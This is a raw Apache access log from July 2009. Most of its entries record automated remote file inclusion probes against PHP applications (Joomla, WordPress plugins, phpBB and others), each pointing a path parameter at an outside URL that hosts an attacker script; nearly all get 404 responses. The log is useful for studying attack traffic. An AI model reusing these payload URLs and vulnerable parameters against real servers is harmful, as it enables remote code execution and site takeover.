220.231.126.252 - - [17/Jul/2009:03:04:39 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
220.231.126.252 - - [17/Jul/2009:03:04:39 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:03:04:40 -0400] "GET /logs/access_log.Q109061900%20%20/includes/functions_admin.php?phpbb_root_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
87.202.82.165 - - [17/Jul/2009:03:05:07 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AUTOSIGN W2000 WNT VER03; GTB6; IEMB3; IEMB3)"
200.54.177.242 - - [17/Jul/2009:03:05:13 -0400] "GET /logs/error_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.futbol-local.com/joom/pwn/fx29id.txt?? HTTP/1.0" 404 261 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:15 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:15 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:15 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:24 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:24 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:25 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:05:33 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:35 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:35 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:35 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:05:35 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:39 -0400] "GET /logs/access_log.Q109051200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:39 -0400] "GET /logs/access_log.Q109052900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:39 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:05:41 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:42 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:42 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:47 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:05:47 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:05:49 -0400] "GET /logs/access_log.Q109070200%20%20/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
202.57.163.125 - - [17/Jul/2009:03:05:54 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.concept420.com//cms/tmp/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
202.57.163.125 - - [17/Jul/2009:03:05:54 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.concept420.com//cms/tmp/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
202.57.163.125 - - [17/Jul/2009:03:05:54 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.concept420.com//cms/tmp/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
202.57.163.125 - - [17/Jul/2009:03:05:54 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.concept420.com//cms/tmp/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:03:05:55 -0400] "GET //ashnews.php?pathtoashnews=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:03:05:55 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:03:05:55 -0400] "GET /logs/access_log.Q109071100%20%20//ashnews.php?pathtoashnews=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:06:03 -0400] "GET /logs/access_log.Q109070200%20%20/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:06:12 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:06:12 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:06:14 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:03:06:15 -0400] "GET /logs/access_log.Q109061000%20%20//ashnews.php?pathtoashnews=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:06:15 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:06:24 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:03:06:24 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:03:06:24 -0400] "GET /logs//main.php?sayfa=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:03:06:24 -0400] "GET //main.php?sayfa=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:06:25 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:06:27 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:06:29 -0400] "GET /logs/access_log.Q109070200%20%20/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
202.57.163.125 - - [17/Jul/2009:03:06:36 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.concept420.com//cms/tmp/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
202.57.163.125 - - [17/Jul/2009:03:06:36 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.concept420.com//cms/tmp/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
202.57.163.125 - - [17/Jul/2009:03:06:36 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.concept420.com//cms/tmp/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
202.57.163.125 - - [17/Jul/2009:03:06:36 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.concept420.com//cms/tmp/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:06:36 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:06:37 -0400] "GET /logs/access_log.Q109070300%20%20/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:03:06:39 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:03:06:39 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:03:06:39 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:03:06:39 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:06:40 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
189.22.96.158 - - [17/Jul/2009:03:06:42 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
206.225.23.4 - - [17/Jul/2009:03:06:46 -0400] "GET /logs/access_log.Q109050900%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:06:49 -0400] "GET /logs/access_log.Q109070300%20%20/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:07:17 -0400] "GET /logs/access_log.Q109070300%20%20/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:07:17 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
213.236.208.22 - - [17/Jul/2009:03:07:50 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Opera/9.70 (X11; Linux i686; U; en) Presto/2.3.0"
213.236.208.22 - - [17/Jul/2009:03:07:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Opera/9.70 (X11; Linux i686; U; en) Presto/2.3.0"
213.236.208.22 - - [17/Jul/2009:03:07:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Opera/9.70 (X11; Linux i686; U; en) Presto/2.3.0"
213.236.208.22 - - [17/Jul/2009:03:07:51 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Opera/9.70 (X11; Linux i686; U; en) Presto/2.3.0"
119.93.90.155 - - [17/Jul/2009:03:08:25 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:08:34 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:08:34 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:08:34 -0400] "GET /logs/access_log.Q109052900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:08:39 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:08:39 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:08:39 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:08:39 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:08:39 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:03:08:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.243.207.199 - - [17/Jul/2009:03:08:48 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:03:08:48 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:03:08:48 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:03:09:30 -0400] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:03:10:12 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:10:18 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:10:19 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:10:25 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:10:30 -0400] "GET /logs/access_log.Q109070300/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:11:01 -0400] "GET /logs/access_log.Q109070300/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:03:11:02 -0400] "GET /logs/access_log.Q109070300/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
72.30.161.230 - - [17/Jul/2009:03:11:04 -0400] "GET /logs/error_log.Q108090900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.102.9.216 - - [17/Jul/2009:03:11:42 -0400] "GET /logs//modules/mods_full/shopping_cart/includes/errors.php?error=http://piacere.altervista.org/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
94.102.9.216 - - [17/Jul/2009:03:11:42 -0400] "GET //modules/mods_full/shopping_cart/includes/errors.php?error=http://piacere.altervista.org/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
94.102.9.216 - - [17/Jul/2009:03:11:42 -0400] "GET /logs/access_log.Q109051500%20%20//modules/mods_full/shopping_cart/includes/errors.php?error=http://piacere.altervista.org/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:03:11:46 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
59.125.5.1 - - [17/Jul/2009:03:12:01 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
59.125.5.1 - - [17/Jul/2009:03:12:01 -0400] "GET /?sourcedir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
59.125.5.1 - - [17/Jul/2009:03:12:02 -0400] "GET /logs/?sourcedir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 200 9860 "-" "Mozilla/5.0"
213.230.23.52 - - [17/Jul/2009:03:12:47 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "-" "Mozilla/4.0 (compatible;)"
209.234.201.56 - - [17/Jul/2009:03:12:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.234.201.56 - - [17/Jul/2009:03:12:50 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.234.201.56 - - [17/Jul/2009:03:12:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.234.201.56 - - [17/Jul/2009:03:12:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
114.200.199.144 - - [17/Jul/2009:03:12:53 -0400] "GET /logs/access_log.Q109061600/includes/functions_admin.php?phpbb_root_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
114.200.199.144 - - [17/Jul/2009:03:12:59 -0400] "GET /logs/access_log.Q109053100/includes/functions_admin.php?phpbb_root_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:03:13:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.125.5.1 - - [17/Jul/2009:03:14:03 -0400] "GET /logs/access_log.Q109070800/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 378 "-" "Mozilla/5.0"
59.125.5.1 - - [17/Jul/2009:03:14:03 -0400] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 356 "-" "Mozilla/5.0"
59.125.5.1 - - [17/Jul/2009:03:14:03 -0400] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 351 "-" "Mozilla/5.0"
94.102.9.216 - - [17/Jul/2009:03:14:09 -0400] "GET /logs/access_log.Q109070100%20%20//modules/mods_full/shopping_cart/includes/errors.php?error=http://piacere.altervista.org/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:03:15:54 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:03:15:54 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:03:15:54 -0400] "GET /logs/access_log.Q109063000/akocomments.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:16:28 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.216.19.137 - - [17/Jul/2009:03:16:33 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSN Optimized;US)"
61.78.62.84 - - [17/Jul/2009:03:16:37 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:16:37 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:03:16:37 -0400] "GET /logs/access_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:03:16:38 -0400] "GET /logs/access_log.Q109051400/akocomments.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
